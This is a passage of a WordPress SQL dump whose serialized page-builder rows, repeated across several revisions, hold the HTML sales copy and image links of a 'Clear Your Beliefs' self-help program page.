convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"12";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"12";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:13:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"3";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"1";}i:12;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:18:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"8";}i:12;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"8";}i:13;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}}}'),
(1524, 1972, 'panels_data', 'a:3:{s:7:"widgets";a:18:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"14";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"13";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"12";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"12";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"12";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:15:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:21:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}}}'),
(1526, 1973, 'panels_data', 'a:3:{s:7:"widgets";a:22:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:3:{s:3:"src";s:79:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:159:"<div class="parg-text"><p>Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"1";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:484:"<div class="parg-text"><p><strong>We literally <ul>create our reality</ul> with our beliefs.</strong></p><p>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:3:{s:3:"src";s:64:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"1";s:2:"id";s:2:"22";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}}s:5:"grids";a:17:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"2";}i:15;a:1:{s:5:"cells";s:1:"2";}i:16;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:25:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"14";}i:22;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"15";}i:23;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"15";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1531, 1975, 'panels_data', 'a:3:{s:7:"widgets";a:23:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right 